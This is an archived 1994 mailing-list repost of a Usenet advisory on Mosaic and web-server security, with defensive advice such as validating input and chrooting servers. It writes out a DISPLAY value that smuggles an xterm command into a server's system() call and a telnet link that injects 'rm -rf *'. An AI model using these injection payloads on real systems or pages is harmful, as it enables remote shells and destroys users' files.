mosaic and security- detailed info and request

Ken Case kc
Thu Mar 24 20:37:22 PST 1994 

>Path: news.omnigroup.com!netcomsv!amd!amdahl!pacbell.com!ihnp4.ucsd.edu!galaxy.ucr.edu!library.ucla.edu!agate!howland.reston.ans.net!usc!elroy.jpl.nasa.gov!netline-fddi.jpl.nasa.gov!nntp-server.caltech.edu!vicki
>From: vicki at cco.caltech.edu (Vicki Brown)
>Newsgroups: comp.sys.sun.admin,comp.unix.admin,comp.infosystems.www
>Subject: mosaic and security- detailed info and request
>Date: 24 Mar 1994 23:21:24 GMT
>Organization: California Institute of Technology, Pasadena
>Lines: 88
>Message-ID: <2mt79k$8h6 at gap.cco.caltech.edu>
>NNTP-Posting-Host: piccolo.cco.caltech.edu
>X-Newsreader: NN version 6.5.0 #4 (NOV)

I am currently gathering information about Mosaic in relation to security
and computer breakins.  While what I have is by no means exhaustive, it is
informative and timely enough that I will send out what I have as it is.  You
will be updated when I get more information, and please contact me at
vicki at citsrl.caltech.edu if you have anything to add/suggest/comment.

I have now heard of one tested and true way to gain a shell process on a 
remote computer using Mosaic.  This way exploits _improperly configured 
servers_ and can be avoided.  I have also heard of ways to configure your
server to gain access to those machines that users are on who access your
server. I will mention that those at ncsa who run Mosaic have not made this
information available on the web and should.

~Aggressive breaking in

	You may have noticed places on the web where it has been set up to
query you for information, perhaps by opening a new window for you to type
information in.  To open this new window it is necessary to query your
computer for its display information (it cannot rely on your host name, as
you might be running Mosaic remotely, as I have many times).  Thus, if you
set your environment variable to:

DISPLAY='lupi.srl.caltech.edu `xterm -display lupi.srl.caltech.edu:0.0`'

you could potentially have the remote Mosaic server donate a shell process
to running this xterm on your -display.  Voila.  You have broken in.
	To avoid this entirely, DO NOT RUN SCRIPTS THROUGH HTML.  If you do
run scripts from Mosaic (I'm talking about the kind that you write yourself
and then reference through URL), take some precautions.  This particular way of
using the DISPLAY variable could be avoided by reading the DISPLAY variable
before pushing it through a system() call, and using only the valid displays.
The guy who "discovered" this cracked computers at, among other places, MIT.  
As far as I know, the purely html commands are entirely safe from this.

~Passive breaking in

	There are several ways to write URLs in your html documents that will
execute harmful commands.  I have been told by someone who works in computer
security that you can wire unsafe things into the MIME viewer tables, like
is done with GhostScript, which is the pretty common PostScript viewer; this 
man saw someone wire up csh to a type: when someone references a document, 
the mosaic server opens up a csh on their machine- they've been broken 
into and don't know it.  The same man also says that you can use Mosaic to
"spoof protocols" and do things like use gopher to connect to the mail port 
as the user when the URL is dereferenced.  Another person detailed how you 
could make a URL such as:

  <a href="telnet://x;rm -rf *">ULTRA COOL GIFS HERE</a>

When this gets dereferenced, Mosaic executes the following command:

   system("xterm -e telnet x ; rm -rf *");

i.e, there goes your home directory.
	You can avoid these passive breakins, too.  Pay attention to what 
URL is displayed at the bottom of your Mosaic screen when move your cursor
over it and before you click on it, to notice things like xterm calls.  As
a server administrator, pay attention to all links in all documents, making 
sure that there is nothing untoward in there.  As an experienced friend 
wrote me, "If we all used pure HTML..., there would be no room for breakins.

~Philosophy/Damage Control

	Yes, there are ways to break into systems using Mosaic.  Many of these
can be avoided on your part.  Mosaic is new, and there are probably as-yet-
undiscovered bugs in it.  This should not necessarily stop one from using
it, any more than sendmail bugs stop us from using sendmail; the bugs will
be fixed as they are discovered and new versions are released.  Meanwhile 
you can take steps to limit the damage that may be done if your system gets
broken into using your Mosaic server:

	1) create a separate user account for the web server, and crippple it,
		taking away its file write permissions, root access, etc.
	2) put the stuff in a safe chroot environment, perhaps by using Wietse
		Venema's chrootuid program (ftp ftp.win.tue.nl /pub/security)

Again, please let me know of any other ways to break in or secure a system.
Thanks.

Vicki
<vicki at citsrl.caltech.edu>


-- 
  |/           \ |            \//         ||           \   |          
 8=====-        \|           8CDDDDD=-    \|            O  O   /       \|
  |\        >----+8           /\\        O~~~~~-<        \ |  o    -----xO
 Vicki Brown    /|           |/ \|        /|          _W__\| /____     /|

More information about the OmniWeb-l mailing list